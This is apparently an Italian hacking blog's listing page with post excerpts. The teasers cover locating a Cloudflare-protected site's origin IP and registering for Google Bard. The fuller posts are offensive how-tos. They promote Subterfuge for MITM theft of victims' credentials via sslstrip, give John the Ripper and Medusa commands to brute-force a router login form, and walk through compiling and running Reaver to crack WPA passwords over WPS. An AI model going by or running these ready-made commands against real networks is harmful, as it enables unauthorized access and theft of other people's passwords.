Come trovare l’indirizzo IP di un sito protetto da Cloudflare

hack cloudflare

Cloudflare è un servizio CDN e di protezione che viene utilizzato da molti siti web per proteggere la loro infrastruttura e migliorare le prestazioni. Una delle funzionalità offerte da Cloudflare è la protezione dell’indirizzo IP originale del sito web, rendendolo difficile da trovare. Tuttavia, ci sono alcuni metodi che potrebbero aiutarti a scoprire l’indirizzo IP originale di un sito web protetto da Cloudflare, in passato ne avevo già parlato ma esistono nuovi strumenti più efficaci e aggiornati, dunque ho pensato di realizzare un articolo ex-novo. Tieni presente che utilizzare questi metodi per scopi illegali o dannosi potrebbe comportare conseguenze legali.

Leggi tutto

Bard: come registrarsi dall’Italia e accedere all’IA di Google

bard accettazione prova servizio

Bard non ha per ora l’hype di ChatGPT ma avrà (probabilmente) un impatto enorme nei prossimi mesi/anni nell’ecosistema Google e dunque nella nostra vita di utenti, ormai strettamente dipendenti dai servizi dell’azienda di Mountain View.

Tuttavia, con una decisione assai opinabile (che dimostra l’arretratezza della IA di Google rispetto a ChatGPT di OpenAI), Bard non è accessibile dall’Italia e da molte altre nazioni. Il servizio è accessibile, per ora, soltanto dagli Stati Uniti e dal Regno Unito, consentendo peraltro l’utilizzo della sola lingua inglese per interrogare il chatbot. L’accesso a Bard è inoltre limitato da una waiting list: ci si iscrive e si aspetta di ricevere un invito da Google per testare il chatbot.

Leggi tutto

Pulire un file .pcap contenente un WPA handshake

Spesso un file .pcap contenente l’handshake WPA catturato con tool automatici come Wifite risulta sporcato da altri dati, pacchetti catturati che non riguardano il four way handshake tra router e client Wi-Fi. Ecco perché è necessario ripulire la cattura, lasciando soltanto i pacchetti EAPOL che ci interessano.

Su Question Defense ho trovato un metodo che fa uso di tshark, lo riporto come memo personale, ma credo possa tornare utile a chi si diverte con il wireless hacking:

Leggi tutto

Subterfuge: attacco man in the middle per tutti in pochi clic

Dimenticatevi Ettercap e procedure “complicate” per effettuare un attacco man-in-the-middle (MITM), con Subterfuge anche un bambino è in grado di rubare le credenziali di autenticazione di un client vittima. Non conoscevo questo tool, ancora giovane, ma è stata una scoperta sorprendente.

Uso da anni Ettercap e lo trovo anche semplice ma Subterfuge lo è ancora di più: ha un’interfaccia Web molto chiara che permette di avviare il MITM e visualizzare in tempo reale username e password intercettate dalle connessioni degli utenti vittime del nostro attacco. Inoltre è dotato di moduli aggiuntivi che ne estendono ulteriormente le funzionalità: fake access point, DNS spoofing, Session Hijacking, HTTP Code Injection, spoofing di un server che invii update.

L’installazione su Ubuntu 12.04 (e immagino anche su altre distribuzioni) è molto semplice, basta avviare uno script Python (“sudo python install.py”) che si occuperà del download e del setup di tutto il necessario per usare Subterfuge. Il tool è gestibile da un’interfaccia Web raggiungibile su localhost:80.

Nelle prove che ho effettuato nella mia rete locale sono stato in grado di intercettare username e password di Gmail senza che all’utente venisse mostrato alcun messaggio di connessione insicura, tutto questo è possibile grazie all’utilizzo di sslstrip da parte di Subterfuge.

Il tool come detto è ancora acerbo (l’ultima release è Subterfuge Beta 2.1) e personalmente non sono riuscito ad usare gli altri moduli disponibili ad eccezione del “Credential Harvester” (il modulo che consente l’intercettazione di username e password delle vittime), tuttavia consiglio di provarlo per apprezzarne la semplicità ed efficacia.

subterfuge mitm

Brute force senza dizionario con John the Ripper e Medusa

Veloce segnalazione per non dimenticarmi un metodo per effettuare un attacco brute force senza utilizzare un dizionario servendosi di John the Ripper e Medusa. Nell’esempio che segue il brute force è lanciato contro l’indirizzo 192.168.1.1, provando come username “admin” contro un form web (opzione di Medusa -M web-from):

#john --incremental=all --session=RouterBrute --stdout | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p

nel caso si doveste interrompere e successivamente riprendere il brute force questo è il comando:

#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p

Con i comandi dati in precedenza non si avrà un alert che interrompa il brute force e ci dica se la password è stata individuata per questo si può effettuare un pipe dell’output in un file e successivamente lanciare grep per cercare la stringa “FOUND” per individuare la password del nostro “bersaglio”

#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p >> check.txt

Fonte: Brute force without a dictionary using john

Bucare una rete Wi-Fi protetta con Ubuntu usando Reaver

Fino a qualche giorno fa l’arsenale di chi voleva bucare una rete WiFi protetta era limitato alla suite aircrack-ng (che da poco ho scoperto essere stata eliminata dai repository di Debian e Ubuntu 12.04). Lo scenario è cambiato con l’arrivo di Reaver, programma che sfrutta delle vulnerabilità nel protocollo WiFi Protected Setup (WPS) effettuando un brute force che consente di recuperare la password WPA/WPA2 in poche ore.

Reaver è disponibile in formato sorgente su Google Code e deve essere compilato per funzionare. Per compilare Reaver su Ubuntu è necessario scaricare i seguenti pacchetti:

sudo apt-get install build-essential
sudo apt-get install libpcap0.8-dev
sudo apt-get install libsqlite3-dev

Scaricata e scompattata l’ultima versione del tool, al momento in cui scrivo reaver-1.3, sarà sufficiente compilarlo con i soliti comandi:

./configure
make
sudo make install

A questo punto potremo iniziare a “guardarci intorno” per vedere se attorno a noi ci sono router o AP vulnerabili, nella versione 1.3 di reaver è stato incluso walsh un’utility che permette proprio di individuare dispositivi vulnerabili nelle vicinanze. Per usare walsh è necessario mettere la propria scheda wireless in monitor mode, lo si può fare usando airmon-ng (incluso in aircrack-ng) o iwconfig. Con airmon basterà dare:

sudo airmon-ng start wlan0

Nel caso network-manager o altri software interferiscano con la messa in monitor mode della scheda wireless sarà opportuno terminare tutti i processi che possono disturbare l’operazione con:

sudo airmon-ng check kill

Se si preferisce usare iwconfig (personalmente reputo più affidabile il metodo con airmon-ng), utility solitamente già inclusa in qualsiasi distribuzione, basterà invece dare i seguenti comandi per mettere in monitor mode la scheda wireless:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Fatto questo avremo attivato l’interfaccia mon0 necessaria al funzionamento di reaver. Come detto il primo step è usare walsh per individuare router vulnerabili:

sudo walsh -i mon0

L’output sarà una lista di router con relativo MAC address e nome. Se si dovesse ricevere l’errore “Found packet with bad FCS, skipping” allora si dovrà dare a walsh un’opzione per eliminare questo errore e procedere comunque:

sudo walsh -i mon0 --ignore-fcs

Presa nota del MAC address del router da attaccare potremo procedere finalmente al brute force con reaver nel seguente modo:

reaver -i mon0 -b 00:01:02:03:04:05 -vv

si può anche omettere la verbosità dell’output (opzione -vv) ma consiglio di lasciarla perché così si hanno molte più informazioni sull’attacco che si sta eseguendo.

Per rendere più veloce l’attacco è possibile anche diminuire il delay di 1 secondo nell’attacco forza bruta di reaver come spiegato nei reaver-wps hints and tricks:

reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Reaver salva le sue sessioni di attacco nella directory “/etc/reaver” con una estensione .wpc, se si interrompe una sessione e la si vuole riprendere reaver la caricherà in automatico in base al MAC address del router bersaglio, in alternativa si può caricare manualmente una sessione impartendo l’opzione “–session option”. Non aspettatevi comunque tempi troppo veloci, la riuscita del brute force dipende molto dal modello di router attaccato e da quanto tempo il router bersaglio rimane acceso. Una sola annotazione: il mio portatile, durante un test di attacco con reaver, consumava la carica della batteria in pochissimo tempo, segno che il brute force è esoso in termini di utilizzo delle risorse del sistema.